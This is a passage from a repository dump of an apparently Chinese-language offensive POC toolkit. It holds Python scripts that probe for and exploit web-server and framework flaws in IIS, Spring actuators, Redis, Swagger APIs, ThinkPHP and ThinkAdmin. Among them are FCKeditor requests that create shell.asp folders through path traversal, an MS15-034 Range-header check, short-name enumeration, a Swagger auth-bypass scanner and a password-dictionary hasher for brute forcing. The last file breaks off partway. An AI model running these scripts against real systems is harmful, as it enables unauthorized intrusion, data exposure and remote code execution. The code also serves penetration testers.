hp/connector.php','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/aspx/connector.aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/']
8 | VUL_LIST = []
9 |
10 | """
11 | :查找spring敏感路径泄露信息
12 | """
13 | def spider(urls,time):
14 | """
15 | :return:VUL_LIST
16 | """
17 | s = requests.session()
18 | s.trust_env = False
19 | s.verify = False
20 | status_code = None
21 | s.headers = {
22 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
23 | 'Accept-Encoding': 'gzip, deflate, br',
24 | 'Accept-Language': 'zh-CN,zh;q=0.9',
25 | 'Connection': 'close',
26 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36'
27 | }
28 | for path in Fck_path_list:
29 | urls_path = urls + path
30 | #urls = 'http://110.53.243.248:9006/swagger-ui.html'
31 | try:
32 | content = s.get(urls_path, headers=s.headers, timeout=time, allow_redirects=False)
33 | status_code = content.status_code
34 | if status_code != 404:
35 | VUL_LIST.append(path)
36 | color('[+] %s %s'%(urls_path,str(status_code)),'green')
37 | else:
38 | color('[-] %s %s'%(urls_path,str(status_code)),'red')
39 | except Exception as e:
40 | print('[-] 请求 %s 出现异常 %s'%(urls_path,type(e)))
41 | continue
42 | return VUL_LIST
43 |
44 | def check(**kwargs):
45 | try:
46 | urls = kwargs['url']#/*str*/
47 | urls = urls.strip('/')
48 | VUL_LIST = spider(urls, 3)
49 |
50 | if '/jolokia' in VUL_LIST or '/actuator/jolokia' in VUL_LIST:
51 | print('https://github.com/LandGrey/SpringBootVulExploit')
52 | print('0x03:获取被星号脱敏的密码的明文 (方法一)')
53 | print('0x04:jolokia logback JNDI RCE')
54 | print('0x05:jolokia Realm JNDI RCE')
55 |
56 | elif '/env' in VUL_LIST and '/refresh' in VUL_LIST:
57 | print('https://github.com/LandGrey/SpringBootVulExploit')
58 | print('0x04:获取被星号脱敏的密码的明文 (方法二)')
59 | print('0x05:获取被星号脱敏的密码的明文 (方法三)')
60 | print('0x02:spring cloud SnakeYAML RCE')
61 | print('0x03:eureka xstream deserialization RCE')
62 | print('0x06:h2 database query RCE')
63 | print('0x08:mysql jdbc deserialization RCE')
64 |
65 | elif '/heapdump' in VUL_LIST or '/actuator/heapdump' in VUL_LIST:
66 | print('https://github.com/LandGrey/SpringBootVulExploit')
67 | print('0x06:获取被星号脱敏的密码的明文 (方法四)')
68 | else:
69 | print('[-] 未找到相关漏洞信息, 请参阅: https://github.com/LandGrey/SpringBootVulExploit')
70 | #print(VUL_LIST)
71 | return VUL_LIST
72 | except Exception as e:
73 | print('脚本执行出错 %s'%e)
74 |
75 | if __name__ == "__main__":
76 | a = check(**{'url':'http://www.baidu.com'})
77 | #print(a)
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
--------------------------------------------------------------------------------
/POC/IIS_MS15-034_Range_bytes.py:
--------------------------------------------------------------------------------
1 | try:
2 | import requests
3 | import sys
4 | except ImportError as ierr:
5 | print("Error, looks like you don';t have %s installed", ierr)
6 |
7 | def identify_iis(domain):
8 | req = requests.get(str(domain), verify=False)
9 | remote_server = req.headers['server']
10 |
11 | if "Microsoft-IIS" in remote_server:
12 | print("[+] 服务是 " + remote_server)
13 | ms15_034_test(str(domain))
14 | else:
15 | print("[-] 不是IIS\n可能是: " + remote_server)
16 |
17 | def ms15_034_test(domain):
18 | print("[*] 启动vuln检查!")
19 | headers = {"Range":"bytes=0-18446744073709551615"}
20 | #vuln_buffer = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n";
21 | try:
22 | req = requests.get(str(domain), headers=headers, verify=False)
23 | if "Requested Range Not Satisfiable" in str(req.content):
24 | print("[+] 存在漏洞")
25 | return 1
26 | else:
27 | print("[-] IIS服务无法显示漏洞是否存在. "+"需要手动检测")
28 | return
29 | except Exception as e:
30 | print('发生错误%s'%e)
31 |
32 | print("[*]用法:Range: bytes=0-18446744073709551615")
33 | def check(**kwargs):
34 | result = ms15_034_test(kwargs['url'])
35 | return result
36 | if __name__ == '__main__':
37 | identify_iis(sys.argv[1])
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/POC/IIS_shortname_Scan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # encoding:utf-8
3 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com
4 |
5 |
6 | import sys
7 | import http.client
8 | from urllib import parse
9 | import threading
10 | import queue as Queue
11 | import time
12 |
13 |
14 | class Scanner():
15 | def __init__(self, target):
16 | self.target = target.lower()
17 | if not self.target.startswith('http'):
18 | self.target = 'http://%s' % self.target
19 | self.scheme, self.netloc, self.path, params, query, fragment = \
20 | parse.urlparse(target)
21 | if self.path[-1:] != '/': # ends with slash
22 | self.path += '/'
23 | self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
24 | self.files = []
25 | self.dirs = []
26 | self.queue = Queue.Queue()
27 | self.lock = threading.Lock()
28 | self.threads = []
29 | self.request_method = ''
30 | self.msg_queue = Queue.Queue()
31 | self.STOP_ME = False
32 | threading.Thread(target=self._print).start()
33 |
34 | def _conn(self):
35 | try:
36 | if self.scheme == 'https':
37 | conn = http.client.HTTPSConnection(self.netloc)
38 | else:
39 | conn = http.client.HTTPConnection(self.netloc)
40 | return conn
41 | except Exception as e:
42 | print('[_conn.Exception]%s'%e)
43 | return None
44 |
45 | def _get_status(self, path):
46 | try:
47 | conn = self._conn()
48 | conn.request(self.request_method, path)
49 | status = conn.getresponse().status
50 | conn.close()
51 | return status
52 | except Exception as e:
53 | raise Exception('[_get_status.Exception] %s' % str(e) )
54 |
55 | def is_vul(self):
56 | try:
57 | for _method in ['GET', 'OPTIONS']:
58 | self.request_method = _method
59 | status_1 = self._get_status(self.path + '/*~1*/a.aspx') # an existed file/folder
60 | status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx') # not existed file/folder
61 | if status_1 == 404 and status_2 != 404:
62 | return True
63 | return False
64 | except Exception as e:
65 | raise Exception('[is_vul.Exception] %s' % str(e) )
66 |
67 | def run(self):
68 | for c in self.alphanum:
69 | self.queue.put( (self.path + c, '.*') ) # filename, extension
70 | for i in range(20):
71 | t = threading.Thread(target=self._scan_worker)
72 | self.threads.append(t)
73 | t.start()
74 | for t in self.threads:
75 | t.join()
76 | self.STOP_ME = True
77 |
78 | def report(self):
79 | print('-'*64)
80 | for d in self.dirs:
81 | print('Dir: %s' % d)
82 | for f in self.files:
83 | print('File: %s' % f)
84 | print('-'*64)
85 | print('%d Directories, %d Files found in total' % (len(self.dirs), len(self.files)))
86 | print('Note that * is a wildcard, matches any character zero or more times.')
87 |
88 | def _print(self):
89 | while not self.STOP_ME or (not self.msg_queue.empty()):
90 | if self.msg_queue.empty():
91 | time.sleep(0.05)
92 | else:
93 | print(self.msg_queue.get())
94 |
95 | def _scan_worker(self):
96 | while True:
97 | try:
98 | url, ext = self.queue.get(timeout=1.0)
99 | status = self._get_status(url + '*~1' + ext + '/1.aspx')
100 | if status == 404:
101 | self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext))
102 |
103 | if len(url) - len(self.path)< 6: # enum first 6 chars only
104 | for c in self.alphanum:
105 | self.queue.put( (url + c, ext) )
106 | else:
107 | if ext == '.*':
108 | self.queue.put( (url, '') )
109 |
110 | if ext == '':
111 | self.dirs.append(url + '~1')
112 | self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]')
113 |
114 | elif len(ext) == 5 or (not ext.endswith('*')): # .asp*
115 | self.files.append(url + '~1' + ext)
116 | self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]')
117 |
118 | else:
119 | for c in 'abcdefghijklmnopqrstuvwxyz0123456789':
120 | self.queue.put( (url, ext[:-1] + c + '*') )
121 | if len(ext) < 4: # < len('.as*')
122 | self.queue.put( (url, ext[:-1] + c) )
123 |
124 | except Queue.Empty as e:
125 | break
126 | except Exception as e:
127 | print('[Exception]', e)
128 |
129 | print('[*]用法: [URL]')
130 | def check(**kwargs):
131 | s = Scanner(kwargs['url'])
132 | if not s.is_vul():
133 | s.STOP_ME = True
134 | print('[-] 目标不存在IIS短文件漏洞')
135 | #return
136 | else:
137 | print('[+] 目标存在IIS短文件漏洞')
138 | #return 1
139 | s.run()
140 | s.report()
141 |
142 |
143 |
144 | if __name__ == '__main__':
145 | if len(sys.argv) == 1:
146 | print('Usage: python IIS_shortname_Scan.py http://www.target.com/')
147 | sys.exit()
148 |
149 | target = sys.argv[1]
150 | s = Scanner(target)
151 | if not s.is_vul():
152 | s.STOP_ME = True
153 | print('Server is not vulnerable')
154 | sys.exit(0)
155 |
156 | print('Server is vulnerable, please wait, scanning...')
157 | s.run()
158 | s.report()
159 |
160 |
161 |
162 |
163 |
164 |
165 |
166 |
--------------------------------------------------------------------------------
/POC/JSencode.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | import os
3 | import execjs
4 | import threading
5 |
6 | passfile = "top100password.txt"
7 | jsfile = "md5.js"
8 | encode_fun = "hex_md5"
9 |
10 |
11 | def info():
12 | #os.environ["EXECJS_RUNTIME"] = 'Phantomjs'
13 | print("[+]============================================================")
14 | print("[+] Python调用JS加密password文件内容 ")
15 | print("[+] passfile : 密码字典 ")
16 | print("[+] jsfile : JS文件 ")
17 | print("[+] encode_fun : 加密函数 ")
18 | print("[+]============================================================")
19 | print(" ")
20 |
21 | def Encode(jsfile, passfile):
22 | os.environ["EXECJS_RUNTIME"] = 'Phantomjs'
23 | jsfile = './POC/js_examples/' + jsfile
24 | passfile = './POC/js_examples/' + passfile
25 | #jsfile = './js_examples/' + jsfile
26 | #passfile = './js_examples/' + passfile
27 | print("[+] 正在进行加密,请稍后......")
28 | with open (jsfile,'r') as strjs:
29 | src = strjs.read()
30 | #phantom = execjs.get('PhantomJS') #调用JS依赖环境
31 | #getpass = phantom.compile(src) #编译执行js脚本
32 | getpass = execjs.compile(src)
33 | with open(passfile, 'r') as strpass:
34 | for passwd in strpass.readlines():
35 | try:
36 | passwd = passwd.strip()
37 | mypass = getpass.call(encode_fun, passwd) #传递参数
38 | print("[+] %s 加密完成: %s"%(passwd,mypass))
39 | except:
40 | print("[-] %s 加密失败"%passwd)
41 | continue
42 | print("[+] 加密完成")
43 |
44 | #对单一密码进行加密
45 | def passstring(jsfile, password):
46 | print("[+] 正在进行加密,请稍后......")
47 | with open (jsfile,'r') as strjs:
48 | src = strjs.read()
49 | phantom = execjs.get('PhantomJS') #调用JS依赖环境
50 | getpass = phantom.compile(src) #编译执行js脚本
51 | mypass = getpass.call(encode_fun, password) #传递参数
52 | print("[+] 加密完成:{}".format(mypass))
53 |
54 | info()
55 | def check(**kwargs):
56 | t = threading.Thread(target=Encode, args=(jsfile, passfile))
57 | t.start()
58 |
59 | if __name__ == "__main__":
60 | check(**{"1":"1"})
61 |
62 |
63 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/POC/Nginx_iis_scan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # -*- coding: UTF-8 -*-
3 | import requests
4 | import urllib3
5 | import threading
6 | import queue
7 | import sys,getopt
8 | sys.path.append('../')
9 | from ClassCongregation import _urlparse
10 |
11 | error=20 #误差值(5~10),此参数不用修改,已最优。
12 | urllib3.disable_warnings()
13 |
14 | def Nginx_iis_scan(url):
15 | try:
16 | path = '/.php'
17 | path2 = '/.232index'#异常测试时需要,能降低防止误报
18 | res=requests.get(url=url+path,verify=False,timeout=5)
19 | count=len(res.text)
20 | if res.status_code==200:#判断响应值
21 | res2 = requests.get(url=url + path2, verify=False, timeout=5)
22 | count2=len(res2.text)
23 | sum=count-count2
24 | if error>=abs(sum):#获取绝对值,计算误差。
25 | print(url + path2 + ' No Loophole')
26 | else:
27 | print(url+' 确定存在解析漏洞')
28 | return True
29 | else:
30 | print(url+path+' '+str(res.status_code))
31 | except Exception as e:
32 | print(url,str(e))
33 |
34 | print('[*]请输入目标服务器上存在的静态资源文件链接,如 http://www.baidu.com/robots.txt')
35 | def check(**kwargs):
36 | Nginx_iis_scan(kwargs['url'])
37 |
38 | if __name__ == "__main__":
39 | Nginx_iis_scan(_urlparse("http://baidu.com/123.php"))
40 | print('task complete~~~~~~~~~~ 完了')
41 |
42 |
43 |
44 |
--------------------------------------------------------------------------------
/POC/Redis_unauthorized_access.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import socket
4 |
5 | vuln = ['redis', '6379']
6 |
7 | print('[*]Usage: [IP]')
8 | def check(**kwargs):
9 | ip = kwargs['ip']
10 | port = int(6379)
11 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
12 | s.settimeout(5)
13 | try:
14 | s.connect((ip, port))
15 | payload = b'\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
16 | s.send(payload)
17 | data = s.recv(1024)
18 | s.close()
19 | if b"redis_version" in data:
20 | print('[+]6379 Redis Unauthorized Access')
21 | else:
22 | print('[-]target is not vulnerable')
23 | except Exception as e:
24 | s.close()
25 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/POC/Scan_zip.py:
--------------------------------------------------------------------------------
1 | import urllib.parse
2 | import requests
3 | import time
4 | from bs4 import BeautifulSoup
5 |
6 | headers = {"Range":"bytes=0-4999"}
7 |
8 | def check(**kwargs):
9 | root_url = kwargs['url'].strip('/')
10 | try:
11 | req = requests.get(root_url, timeout=1, headers=headers)
12 | content_type_header = req.headers['content-type']
13 | if '=' in content_type_header:
14 | charset = content_type_header.split('=')[1]
15 | else:
16 | charset = "gb2312"
17 | soup = BeautifulSoup(req.text, 'lxml') #创建 beautifulsoup 对象
18 | system = soup.title.string.encode(charset, errors='ignore').decode(charset)
19 | except Exception as error:
20 | print('[-] 无法获取系统title')
21 | return
22 | system = urllib.parse.quote(system)
23 | year_list = ["2018", "2019", "2020", "2021"]
24 | date_file = ['0101','0102','0103','0104','0105','0106','0107','0108','0109','0110','0111','0112','0113','0114','0115','0116','0117','0118','0119','0120','0121','0122','0123','0124','0125','0126','0127','0128','0129','0130','0131','0201','0202','0203','0204','0205','0206','0207','0208','0209','0210','0211','0212','0213','0214','0215','0216','0217','0218','0219','0220','0221','0222','0223','0224','0225','0226','0227','0228','0229','0230','0231','0301','0302','0303','0304','0305','0306','0307','0308','0309','0310','0311','0312','0313','0314','0315','0316','0317','0318','0319','0320','0321','0322','0323','0324','0325','0326','0327','0328','0329','0330','0331','0401','0402','0403','0404','0405','0406','0407','0408','0409','0410','0411','0412','0413','0414','0415','0416','0417','0418','0419','0420','0421','0422','0423','0424','0425','0426','0427','0428','0429','0430','0431','0501','0502','0503','0504','0505','0506','0507','0508','0509','0510','0511','0512','0513','0514','0515','0516','0517','0518','0519','0520','0521','0522','0523','0524','0525','0526','0527','0528','0529','0530','0531','0601','0602','0603','0604','0605','0606','0607','0608','0609','0610','0611','0612','0613','0614','0615','0616','0617','0618','0619','0620','0621','0622','0623','0624','0625','0626','0627','0628','0629','0630','0631','0701','0702','0703','0704','0705','0706','0707','0708','0709','0710','0711','0712','0713','0714','0715','0716','0717','0718','0719','0720','0721','0722','0723','0724','0725','0726','0727','0728','0729','0730','0731','0801','0802','0803','0804','0805','0806','0807','0808','0809','0810','0811','0812','0813','0814','0815','0816','0817','0818','0819','0820','0821','0822','0823','0824','0825','0826','0827','0828','0829','0830','0831','0901','0902','0903','0904','0905','0906','0907','0908','0909','0910','0911','0912','0913','0914','0915','0916','0917','0918','0919','0920','0921','0922','0923','0924','0925','0926','0927','0928','0929','0930','0931','1001','1002','1003','1004','1005','1006','1007','1008','1009','1010','1011','1012','1013','1014','1015','1016','1017','1018','1019','1020','1021','1022','1023','1024','1025','1026','1027','1028','1029','1030','1031','1101','1102','1103','1104','1105','1106','1107','1108','1109','1110','1111','1112','1113','1114','1115','1116','1117','1118','1119','1120','1121','1122','1123','1124','1125','1126','1127','1128','1129','1130','1131','1201','1202','1203','1204','1205','1206','1207','1208','1209','1210','1211','1212','1213','1214','1215','1216','1217','1218','1219','1220','1221','1222','1223','1224','1225','1226','1227','1228','1229','1230','1231']
25 | ext_list = [".zip", ".rar"]
26 | for y in year_list:
27 | print("%s年:"%y)
28 | for d in date_file:
29 | for e in ext_list:
30 | url = root_url + '/' +system + y + d.strip() + e
31 | try:
32 | resp = requests.get(url, timeout=1, headers=headers)
33 | if resp.status_code == 404:
34 | print("[-] " + url + ": " + str(resp.status_code))
35 | else:
36 | raise Exception("?")
37 | except:
38 | print("[?]" + url + ": " + "?")
--------------------------------------------------------------------------------
/POC/Swagger-exp.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- encoding: utf-8 -*-
3 | # Swagger REST API Exploit
4 | # By LiJieJie my[at]lijiejie.com
5 |
6 | import requests
7 | import json
8 | import time
9 | from urllib.parse import urlparse
10 | from ClassCongregation import color
11 |
12 | requests.packages.urllib3.disable_warnings()
13 | api_set_list = [] # ALL API SET
14 | scheme = 'http' # default value
15 | headers = {'User-Agent': 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'}
16 | auth_bypass_detected = False
17 |
18 |
19 | def print_msg(msg, colors='black'):
20 | _msg = '[%s] %s' % (time.strftime('%H:%M:%S', time.localtime()), msg)
21 | color(_msg, colors)
22 | #print(_msg)
23 |
24 |
25 | def find_all_api_set(start_url):
26 | try:
27 | text = requests.get(start_url, headers=headers, verify=False).text
28 | if text.strip().startswith('{"swagger":"'): # from swagger.json
29 | api_set_list.append(start_url)
30 | print_msg('[OK] [API set] %s' % start_url)
31 | with open('./data/api-docs.json', 'w', encoding='utf-8') as f:
32 | f.write(text)
33 | elif text.find('"swaggerVersion"') > 0: # from /swagger-resources/
34 | base_url = start_url[:start_url.find('/swagger-resources')]
35 | json_doc = json.loads(text)
36 | for item in json_doc:
37 | url = base_url + item['location']
38 | find_all_api_set(url)
39 | else:
40 | print_msg('[FAIL] Invalid API Doc: %s' % start_url)
41 | except Exception as e:
42 | print_msg('[find_all_api_set] process error %s' % e)
43 |
44 |
45 | def process_doc(url):
46 | try:
47 | json_doc = requests.get(url, headers=headers, verify=False).json()
48 | base_url = scheme + '://' + json_doc['host'] + json_doc['basePath']
49 | base_url = base_url.rstrip('/')
50 | for path in json_doc['paths']:
51 |
52 | for method in json_doc['paths'][path]:
53 | if method.upper() not in ['GET', 'POST', 'PUT']:
54 | continue
55 |
56 | params_str = ''
57 | sensitive_words = ['url', 'path', 'uri']
58 | sensitive_params = []
59 | if 'parameters' in json_doc['paths'][path][method]:
60 | parameters = json_doc['paths'][path][method]['parameters']
61 |
62 | for parameter in parameters:
63 | para_name = parameter['name']
64 | # mark sensitive parma
65 | for word in sensitive_words:
66 | if para_name.lower().find(word) >= 0:
67 | sensitive_params.append(para_name)
68 | break
69 |
70 | if 'format' in parameter:
71 | para_format = parameter['format']
72 | elif 'schema' in parameter and 'format' in parameter['schema']:
73 | para_format = parameter['schema']['format']
74 | elif 'schema' in parameter and 'type' in parameter['schema']:
75 | para_format = parameter['schema']['type']
76 | elif 'schema' in parameter and '$ref' in parameter['schema']:
77 | para_format = parameter['schema']['$ref']
78 | para_format = para_format.replace('#/definitions/', '')
79 | para_format = '{OBJECT_%s}' % para_format
80 | else:
81 | para_format = parameter['type'] if 'type' in parameter else 'unkonwn'
82 |
83 | is_required = '' if parameter['required'] else '*'
84 | params_str += '&%s=%s%s%s' % (para_name, is_required, para_format, is_required)
85 | params_str = params_str.strip('&')
86 | if sensitive_params:
87 | print_msg('[*] Possible vulnerable param found: %s, path is %s' % (
88 | sensitive_params, base_url+path), 'green')
89 |
90 | scan_api(method, base_url, path, params_str)
91 | except Exception as e:
92 | print_msg('[process_doc error][%s] %s' % (url, e))
93 |
94 |
95 | def scan_api(method, base_url, path, params_str, error_code=None):
96 | # place holder
97 | _params_str = params_str.replace('*string*', 'a')
98 | _params_str = _params_str.replace('*int64*', '1')
99 | _params_str = _params_str.replace('*int32*', '1')
100 | _params_str = _params_str.replace('=string', '=test')
101 | _params_str = _params_str.replace('*number*', '1')
102 | _params_str = _params_str.replace('*date-time*', '20211104')
103 | _params_str = _params_str.replace('*boolean*', 'false')
104 |
105 | api_url = base_url + path
106 | # url黑名单
107 | sensitive_url = ['delete']
108 | for url in sensitive_url:
109 | if api_url.lower().find(url) >= 0:
110 | print_msg('[Continue] %s' % (api_url))
111 | return
112 | if not error_code:
113 | print_msg('[%s] %s %s' % (method.upper(), api_url, params_str))
114 | if method.upper() == 'GET':
115 | r = requests.get(api_url + '?' + _params_str, headers=headers, verify=False)
116 | if not error_code:
117 | if r.status_code == 200:
118 | print_msg('[Request] %s %s' % (method.upper(), api_url + '?' + _params_str), 'green')
119 | else:
120 | print_msg('[Request] %s %s' % (method.upper(), api_url + '?' + _params_str), 'red')
121 | else:
122 | r = requests.post(api_url, data=_params_str, headers=headers, verify=False)
123 | if not error_code:
124 | if r.status_code == 200:
125 | print_msg('[Request] %s %s \n%s' % (method.upper(), api_url, _params_str), 'green')
126 | else:
127 | print_msg('[Request] %s %s \n%s' % (method.upper(), api_url, _params_str), 'red')
128 |
129 | content_type = r.headers['content-type'] if 'content-type' in r.headers else ''
130 | content_length = r.headers['content-length'] if 'content-length' in r.headers else ''
131 | if not content_length:
132 | content_length = len(r.content)
133 | if not error_code:
134 | print_msg('[Response] Code: %s Content-Type: %s Content-Length: %s' % (
135 | r.status_code, content_type, content_length))
136 | else:
137 | #if r.status_code not in [401, 403, 500] or r.status_code != error_code:
138 | if r.status_code not in [401, 403]:
139 | global auth_bypass_detected
140 | auth_bypass_detected = True
141 | print_msg('[VUL] *** URL Auth Bypass ***')
142 | if method.upper() == 'GET':
143 | print_msg('[BypassRequest] [%s] %s Code: %s' % (method.upper(), api_url + '?' + _params_str, r.status_code), 'blue')
144 | else:
145 | print_msg('[BypassRequest] [%s] %s \n%s Code: %s' % (method.upper(), api_url, _params_str, r.status_code), 'blue')
146 |
147 | # Auth Bypass Test, 401,403 bypass
148 | if not error_code and r.status_code in [401, 403]:
149 | path = '/' + path
150 | scan_api(method, base_url, path, params_str, error_code=r.status_code)
151 |
152 |
153 | print('[*] 请输入api-docs.json地址, 将自动对所有接口进行测试!!!')
154 | def check(**kwargs):
155 | global api_set_list
156 | api_set_list.clear()
157 | try:
158 | _scheme = urlparse(kwargs['url']).scheme.lower()
159 | if _scheme.lower() == 'https':
160 | global scheme
161 | scheme = 'https'
162 | find_all_api_set(kwargs['url'])
163 | for url in api_set_list:
164 | process_doc(url)
165 | except Exception as e:
166 | pass
167 |
168 |
--------------------------------------------------------------------------------
/POC/TPscan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding=utf-8
3 | from plugins.thinkphp_checkcode_time_sqli import thinkphp_checkcode_time_sqli_verify
4 | from plugins.thinkphp_construct_code_exec import thinkphp_construct_code_exec_verify
5 | from plugins.thinkphp_construct_debug_rce import thinkphp_construct_debug_rce_verify
6 | from plugins.thinkphp_debug_index_ids_sqli import thinkphp_debug_index_ids_sqli_verify
7 | from plugins.thinkphp_driver_display_rce import thinkphp_driver_display_rce_verify
8 | from plugins.thinkphp_index_construct_rce import thinkphp_index_construct_rce_verify
9 | from plugins.thinkphp_index_showid_rce import thinkphp_index_showid_rce_verify
10 | from plugins.thinkphp_invoke_func_code_exec import thinkphp_invoke_func_code_exec_verify
11 | from plugins.thinkphp_lite_code_exec import thinkphp_lite_code_exec_verify
12 | from plugins.thinkphp_method_filter_code_exec import thinkphp_method_filter_code_exec_verify
13 | from plugins.thinkphp_multi_sql_leak import thinkphp_multi_sql_leak_verify
14 | from plugins.thinkphp_pay_orderid_sqli import thinkphp_pay_orderid_sqli_verify
15 | from plugins.thinkphp_request_input_rce import thinkphp_request_input_rce_verify
16 | from plugins.thinkphp_view_recent_xff_sqli import thinkphp_view_recent_xff_sqli_verify
17 | import time,requests
18 | print('''
19 | ___________
20 | |_ _| ___ \
21 | | | | |_/ /__ ___ __ _ _ __
22 | | | | __/ __|/ __/ _` | '_ \
23 | | | | | \__ \ (_| (_| | | | |
24 | \_/ \_| |___/\___\__,_|_| |_|
25 | code by Lucifer
26 | ''')
27 | print("用法:http://example.com/{index.php}不需要index.php")
28 | def check(**kwargs):
29 | url = kwargs['url']
30 | try:
31 | s = requests.session()
32 | s.keep_alive = False
33 | thinkphp_checkcode_time_sqli_verify(url)
34 | time.sleep(0.5)
35 | thinkphp_construct_code_exec_verify(url)
36 | time.sleep(0.5)
37 | thinkphp_construct_debug_rce_verify(url)
38 | time.sleep(0.5)
39 | thinkphp_debug_index_ids_sqli_verify(url)
40 | time.sleep(0.5)
41 | thinkphp_driver_display_rce_verify(url)
42 | time.sleep(0.5)
43 | thinkphp_index_construct_rce_verify(url)
44 | time.sleep(0.5)
45 | thinkphp_index_showid_rce_verify(url)
46 | time.sleep(0.5)
47 | thinkphp_invoke_func_code_exec_verify(url)
48 | time.sleep(0.5)
49 | thinkphp_lite_code_exec_verify(url)
50 | time.sleep(0.5)
51 | thinkphp_method_filter_code_exec_verify(url)
52 | time.sleep(0.5)
53 | thinkphp_multi_sql_leak_verify(url)
54 | time.sleep(0.5)
55 | thinkphp_pay_orderid_sqli_verify(url)
56 | time.sleep(0.5)
57 | thinkphp_request_input_rce_verify(url)
58 | time.sleep(0.5)
59 | thinkphp_view_recent_xff_sqli_verify(url)
60 | except Exception as e:
61 | print("异常对象内容%s"%e)
--------------------------------------------------------------------------------
/POC/ThinkAdmin.py:
--------------------------------------------------------------------------------
1 | import requests,sys
2 |
3 | def check(**kwargs):
4 | url = kwargs['url']
5 | u = url+"/admin.html?s=admin/api.Update/node"
6 | data = {'rules':'["/"]'}
7 | r = requests.post(u,data=data)
8 | if r.status_code == 200:
9 | if "获取文件列表成功" in r.text:
10 | print("[+] %s 存在未授权列目录" % url)
11 | return 1
12 | else:
13 | print("[-] %s 不存在漏洞" %url)
14 | return
15 | if __name__ == "__main__":
16 | if len(sys.argv) == 2:
17 | poc(sys.argv[1])
18 | else:
19 | print("Usage: python poc.py http://127.0.0.1")
20 |
--------------------------------------------------------------------------------
/POC/ThinkphpVersion.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | from ClassCongregation import color
3 | import requests
4 | import re
5 |
6 | print("用法:http://example.com/{index.php}可选")
7 | pathdict = [
8 | '?s=index2/index/index',
9 | '?s=index/index/index',
10 | ]
11 |
12 | def check(**kwargs):
13 | url = kwargs['url'].strip('/')
14 | headers = {
15 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',
16 | 'Connection': 'close',
17 | 'Accept-Encoding': 'gzip, deflate',
18 | 'Accept': '*/*',}
19 | for path in pathdict:
20 | try:
21 | r = requests.get(url + path, headers=headers, timeout=5, verify=False)
22 | if (re.findall('ThinkPHP', r.text, flags=re.IGNORECASE)) or ('系统发生错误' in r.text) or ('无法载入模组' in r.text):
23 | try:
24 | version =re.search(r'([356]\.)([012]\.)(\d{1,2})',r.text).group()
25 | except Exception:
26 | version = '?.?.?'
27 | try:
28 | r_title = requests.get(url, headers=headers, timeout=5, verify=False)
29 | title = "".join(re.findall('
(.+)',r_title.text))
30 | except Exception:
31 | title = '?.?.?'
32 |
33 | color('[+] ThinkPHP V%s | '%version + url +' | '+title, 'green')
34 | return 'ThinkPHP V'+version
35 | except Exception:
36 | color('[-] Request error | ' + url + path, 'red')
37 | #color("[*] %s request error!"%(url + path), 'red')
38 | #continue
39 | color('[-] No ThinkPHP | ' + url, 'red')
40 | return 'None'
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
--------------------------------------------------------------------------------
/POC/Thinkphp_5_0_23_rce.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import random,sys
3 |
4 | #from lib.Requests import Requests
5 | import requests
6 | vuln = ['ThinkPHP', 'ThinkSNS']
7 | random_num = ''.join(str(i) for i in random.sample(range(0, 9), 8))
8 |
9 | print('thinkphp v5.x 远程代码执行漏洞-POC集合:https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection')
10 | print("用法:http://example.com/{index.php}不需要index.php")
11 | def check(**kwargs):
12 | url = kwargs['url']
